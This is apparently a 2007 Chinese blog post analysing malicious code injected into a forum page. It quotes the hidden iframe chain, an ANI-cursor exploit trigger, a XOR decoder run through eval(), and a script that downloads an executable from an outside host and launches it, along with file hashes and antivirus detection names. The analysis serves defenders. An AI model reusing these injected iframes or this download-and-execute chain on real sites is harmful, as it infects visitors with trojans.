某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码
来源:互联网 发布:centos不安装图形界面 编辑:程序博客网 时间:2024/06/08 05:53
endurer 原创
2007-04-22 第1版
加入的代码为:
/---
<iframe src='hxxp://s**72.91**152**0.net/site/g****g/1**.htm' height=0 width=50></iframe>
---/
hxxp://s**72.91**152**0.net/site/g****g/1**.htm 包含为:
/---
<DIV
style="CURSOR: url('love.jpg')"></DIV></DIV></BODY></HTML>
<iframe src=hxxp://s**72.91**152**0.net/site/g****g/1**4.htm name="main1" height="0" width="100" ></iframe>
---/
love.jpg(Kaspersky报为Exploit.Win32.IMG-ANI.k)下载 http://mail.8u8y.com/ad/pic/1.exe
文件说明符 : D:/test/1.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-20 12:39:24
修改时间 : 2007-4-20 12:40:32
访问时间 : 2007-4-20 12:40:42
大小 : 21479 字节 20.999 KB
MD5 : 946bc00b1bcc782fade890c049e8e112
Kaspersky 报为 Trojan-Downloader.Win32.Delf.bga ,瑞星报为 Trojan.Mnless.kip
hxxp://s**72.91**152**0.net/site/g****g/1**4.htm的内容为JavaScript脚本代码,功能为用自定义函数:
/---
var Z=function(m){return String.fromCharCode(m^79)};
---/
解密代码并通过 eval() 来运行。
解密后的 内容仍为JavaScript脚本代码,功能为
是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 hxxp://mail.8***u**8y.com/ad/pic***/temp.exe,保存到%windir%,文件名由自定义函数:
/---
function gn(n){var number = Math.random()*n;
return '~tmp'+Math.round(number)+'.exe';}
---/
生成,即 ~tmp****.exe,其中****为 数字。然后通过 Shell.Application 对象 Q 的 ShellExecute 方法运行。
temp.exe与前面的1.exe相同。
- 某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码
- 某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
- 某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
- 某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
- 某论坛所用计数器利用 PPStream,Thunder等漏洞传播Trojan.PSW.Win32.OnlineGames.xzr等
- 某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
- 某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码
- 某省盐业网被植入传播Trojan.DL.Win32.Agent.zrc的代码
- 某网站挂Trojan-Downloader.SWF.Small利用flash漏洞传播Trojan-Downloader.Win32.Small
- 某留学网站被植入利用 PPStream 堆栈漏洞的代码
- 某P2P视频软件论坛被挂马Trojan.DL.Win32.Mnless.rq
- 某县农业网被植入利用暴风影音2缓冲区溢出等漏洞的恶意代码
- 某论坛被加入下载Trojan-Downloader.Win32.Delf.ajm的代码
- 某论坛被加入下载Trojan-clicker.Win32.VB.qq的代码
- 某职业指导网被挂Trojan.Win32.KillAV,Trojan.PSW.Win32.QQPass,RootKit.Win32.Mnless等
- 某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
- 某市国税信息检索系统被植入传播Worm.Win32.Delf.bs的代码
- 某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码
- 二维数组
- 1933年9月被罗德西亚(今赞比亚)的贝恩巴部落里人们的工作情形
- 网页乱码 UTF-8与GB2312 及 JSP中文问题
- Hibernate、iBATIS 与 BLOB [转]
- 人生无希望
- 某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码
- 测试发贴!
- 关于typedef的用法
- 几种常见的视频文件格式介绍(转载)
- foreverloveu
- 关于asp.net只能有一个form标签
- vba小技巧
- 《Ajax模式与最佳实践》前6章的勘误
- CSS设定样式表使用特定的字符集